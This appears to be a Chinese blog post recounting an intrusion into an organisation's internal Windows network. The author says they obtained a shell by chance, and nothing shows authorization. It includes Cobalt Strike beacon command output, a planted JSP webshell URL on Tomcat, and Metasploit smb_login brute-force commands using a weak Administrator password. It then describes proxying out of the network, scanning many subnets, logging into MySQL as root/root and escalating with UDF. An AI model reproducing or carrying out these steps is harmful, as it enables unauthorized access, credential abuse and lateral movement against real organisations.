记一次内网渗透
无意中拿到了一个shell 然后花了几天内网渗透。还是有点收获的
没啥技巧可言了。都是一些瞎操作了。别喷就行了
先介绍一下环境把
WEB: 内网主机 192.168.1.231 (无域控。就是工作组)
数据库: 192.168.2.150 (MSSQL )
拿到shell 之后 看了一下systeminfo
OS 名称: Microsoft Windows Server 2008 R2 Standard OS 版本: 6.1.7601 Service Pack 1 Build 7601 OS 制造商: Microsoft Corporation OS 配置: 独立服务器 OS 构件类型: Multiprocessor Free 注册的所有人: Windows 用户 注册的组织: 处理器: 安装了 4 个处理器。 [01]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz [02]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz [03]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz [04]: Intel64 Family 6 Model 37 Stepping 1 GenuineIntel ~1995 Mhz Windows 目录: C:\Windows 系统目录: C:\Windows\system32 启动设备: \Device\HarddiskVolume1 系统区域设置: zh-cn;中文(中国) 输入法区域设置: zh-cn;中文(中国) 时区: (UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐 物理内存总量: 32,768 MB 可用的物理内存: 28,347 MB 虚拟内存: 最大值: 65,533 MB 虚拟内存: 可用: 60,619 MB 虚拟内存: 使用中: 4,914 MB 域: WORKGROUP 登录服务器: 暂缺 修补程序: 安装了 278 个修补程序。 [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB2849697 [07]: KB2849696 [08]: KB2841134 [09]: KB2841134 [10]: KB977239 [11]: KB2670838 [12]: KB981390 [13]: KB2386667 [14]: KB2506014 [15]: KB2506212 [16]: KB2506928 [17]: KB2509553 [18]: KB2511455 [19]: KB2536275 [20]: KB2544893 [21]: KB2545698 [22]: KB2547666 [23]: KB2552343 [24]: KB2560656 [25]: KB2563227 [26]: KB2564958 [27]: KB2570947 [28]: KB2585542 [29]: KB2603229 [30]: KB2604115 [31]: KB2607047 [32]: KB2608658 [33]: KB2620704 [34]: KB2621440 [35]: KB2631813 [36]: KB2640148 [37]: KB2643719 [38]: KB2653956 [39]: KB2654428 [40]: KB2656356 [41]: KB2660075 [42]: KB2667402 [43]: KB2676562 [44]: KB2685811 [45]: KB2685813 [46]: KB2685939 [47]: KB2690533 [48]: KB2698365 [49]: KB2705219 [50]: KB2706045 [51]: KB2712808 [52]: KB2718704 [53]: KB2719033 [54]: KB2719857 [55]: KB2726535 [56]: KB2729094 [57]: KB2729452 [58]: KB2732059 [59]: KB2736422 [60]: KB2742599 [61]: KB2750841 [62]: KB2758857 [63]: KB2761217 [64]: KB2763523 [65]: KB2765809 [66]: KB2770660 [67]: KB2786081 [68]: KB2789645 [69]: KB2791765 [70]: KB2798162 [71]: KB2800095 [72]: KB2807986 [73]: KB2808679 [74]: KB2813430 [75]: KB2834140 [76]: KB2836942 [77]: KB2836943 [78]: KB2839894 [79]: KB2840149 [80]: KB2840631 [81]: KB2843630 [82]: KB2852386 [83]: KB2853952 [84]: KB2861698 [85]: KB2862152 [86]: KB2862330 [87]: KB2862335 [88]: KB2864202 [89]: KB2868038 [90]: KB2868116 [91]: KB2868626 [92]: KB2871997 [93]: KB2884256 [94]: KB2888049 [95]: KB2891804 [96]: KB2892074 [97]: KB2893294 [98]: KB2893519 [99]: KB2894844 [100]: KB2900986 [101]: KB2908783 [102]: KB2911501 [103]: KB2912390 [104]: KB2919469 [105]: KB2929733 [106]: KB2931356 [107]: KB2937610 [108]: KB2943357 [109]: KB2957189 [110]: KB2966583 [111]: KB2968294 [112]: KB2970228 [113]: KB2972100 [114]: KB2972211 [115]: KB2973112 [116]: KB2973201 [117]: KB2973351 [118]: KB2976897 [119]: KB2977292 [120]: KB2978120 [121]: KB2984972 [122]: KB2985461 [123]: KB2987107 [124]: KB2991963 [125]: KB2992611 [126]: KB2993651 [127]: KB3003057 [128]: KB3003743 [129]: KB3004361 [130]: KB3004375 [131]: KB3005607 [132]: KB3006137 [133]: KB3006625 [134]: KB3008923 [135]: KB3010788 [136]: KB3011780 [137]: KB3018238 [138]: KB3019978 [139]: KB3020369 [140]: KB3020370 [141]: KB3021674 [142]: KB3022777 [143]: KB3023215 [144]: KB3030377 [145]: KB3031432 [146]: KB3033889 [147]: KB3033929 [148]: KB3035126 [149]: KB3035132 [150]: KB3037574 [151]: KB3040272 [152]: KB3042058 [153]: KB3042553 [154]: KB3045685 [155]: KB3046017 [156]: KB3046269 [157]: KB3054205 [158]: KB3054476 [159]: KB3055642 [160]: KB3059317 [161]: KB3060716 [162]: KB3068457 [163]: KB3068708 [164]: KB3071756 [165]: KB3072305 [166]: KB3072630 [167]: KB3074543 [168]: KB3075220 [169]: KB3075249 [170]: KB3076895 [171]: KB3078601 [172]: KB3078667 [173]: KB3080149 [174]: KB3080446 [175]: KB3084135 [176]: KB3086255 [177]: KB3087039 [178]: KB3092601 [179]: KB3092627 [180]: KB3097989 [181]: KB3101722 [182]: KB3107998 [183]: KB3108371 [184]: KB3108381 [185]: KB3108664 [186]: KB3108670 [187]: KB3109094 [188]: KB3109103 [189]: KB3109560 [190]: KB3110329 [191]: KB3118401 [192]: KB3121255 [193]: KB3122648 [194]: KB3123479 [195]: KB3124001 [196]: KB3124275 [197]: KB3126587 [198]: KB3127220 [199]: KB3133043 [200]: KB3133977 [201]: KB3135983 [202]: KB3137061 [203]: KB3138612 [204]: KB3138901 [205]: KB3139398 [206]: KB3139914 [207]: KB3139923 [208]: KB3139940 [209]: KB3140245 [210]: KB3140735 [211]: KB3142024 [212]: KB3142042 [213]: KB3145739 [214]: KB3146706 [215]: KB3146963 [216]: KB3147071 [217]: KB3148198 [218]: KB3148851 [219]: KB3149090 [220]: KB3153171 [221]: KB3153199 [222]: KB3153731 [223]: KB3154070 [224]: KB3156013 [225]: KB3156016 [226]: KB3156017 [227]: KB3156019 [228]: KB3159398 [229]: KB3160005 [230]: KB3161561 [231]: KB3161664 [232]: KB3161949 [233]: KB3161958 [234]: KB3162835 [235]: KB3163245 [236]: KB3164033 [237]: KB3164035 [238]: KB3167679 [239]: KB3168965 [240]: KB3170106 [241]: KB3170455 [242]: KB3172605 [243]: KB3175024 [244]: KB3175443 [245]: KB3177186 [246]: KB3177467 [247
权限
beacon> shell whoami [*] Tasked beacon to run: whoami [+] host called home, sent: 37 bytes [+] received output: iis apppool\user11 beacon> shell tasklist [*] Tasked beacon to run: tasklist [+] host called home, sent: 39 bytes [+] received output: 映像名称 PID 会话名 会话# 内存使用 ========================= ======== ================ =========== ============ System Idle Process 0 0 24 K System 4 0 368 K smss.exe 416 0 1,928 K csrss.exe 512 0 11,100 K wininit.exe 552 0 6,736 K csrss.exe 560 1 11,988 K winlogon.exe 608 1 6,956 K services.exe 656 0 16,208 K lsass.exe 664 0 32,736 K lsm.exe 672 0 8,784 K svchost.exe 768 0 14,580 K svchost.exe 836 0 12,864 K svchost.exe 928 0 20,888 K LogonUI.exe 948 1 20,680 K svchost.exe 988 0 61,276 K svchost.exe 232 0 21,556 K svchost.exe 456 0 23,472 K KVSrvXP.exe 548 0 8,212 K ZhuDongFangYu.exe 1076 0 29,500 K svchost.exe 1112 0 38,116 K svchost.exe 1252 0 15,916 K spoolsv.exe 1416 0 17,660 K svchost.exe 1456 0 16,684 K SMSvcHost.exe 1484 0 25,300 K tomcat6.exe 1688 0 150,264 K conhost.exe 1712 0 5,976 K vmtoolsd.exe 1720 0 31,560 K svchost.exe 1760 0 17,172 K svchost.exe 2516 0 12,728 K svchost.exe 2560 0 7,832 K msdtc.exe 2856 0 9,872 K LogonUI.exe 3380 0 19,416 K csrss.exe 9452 2 19,644 K winlogon.exe 8228 2 8,852 K taskhost.exe 10768 2 17,132 K rdpclip.exe 10884 2 10,792 K dwm.exe 10964 2 8,660 K explorer.exe 11012 2 85,648 K 360sd.exe 11060 2 2,880 K vmtoolsd.exe 10516 2 26,124 K KVMonXP.exe 500 2 4,076 K SiteServer.Service.exe 10552 2 87,260 K 360hotfix.exe 10576 2 22,528 K 360tray.exe 4024 2 52,228 K 360DesktopLite64.exe 3868 2 110,332 K UKeyDetect.exe 3576 2 16,612 K conhost.exe 372888 0 4,788 K 360rp.exe 349132 2 35,320 K cmd.exe 385872 0 4,472 K conhost.exe 385508 0 4,588 K cmd.exe 382852 0 4,484 K conhost.exe 383824 0 4,580 K rundll32.exe 386844 0 37,568 K cmd.exe 386184 0 4,512 K conhost.exe 380768 0 4,884 K w3wp.exe 403908 0 594,248 K w3wp.exe 408248 0 483,596 K dllhost.exe 415040 0 13,248 K TrustedInstaller.exe 413620 0 17,740 K cmd.exe 410940 0 4,632 K conhost.exe 416436 0 4,864 K tasklist.exe 416528 0 7,088 K WmiPrvSE.exe 416228 0 9,304 K
发现有一个tomcat6.0 。 找到那个tomcat6 的安装目录。传了一个shell上去。
http://192.168.1.231:8081/manager/images/ccc.jsp?cmd=whoami
权限为system权限。
然后上线到cs 中读取一下密码
——- 先转发到msf 中。通过smb_login 爆破登陆
msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > show options msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-155 msf auxiliary(smb_login) > set SMBUser Administrator msf auxiliary(smb_login) > se SMBPass 123 msf auxiliary(smb_login) > run
爆破出了三台服务器。统统上线
然后通过CS 的Listen
反代内网出来
扫描内网。
内网大概如下:
192.168.1.0/24
192.168.2.0/24
192.168.3.0/24
192.168.4.0/24
192.168.5.0/24
192.168.6.0/24
192.168.7.0/24
192.168.8.0/24
192.168.10.0/24
192.168.20.0/24
192.168.30.0/24
192.168.40.0/24
192.168.50.0/24
192.168.60.0/24
192.168.70.0/24
192.168.80.0/24
扫描端口。探测。发现192.168.1.11 开发3306 密码root root
通过udf 提权
然后继续上线CS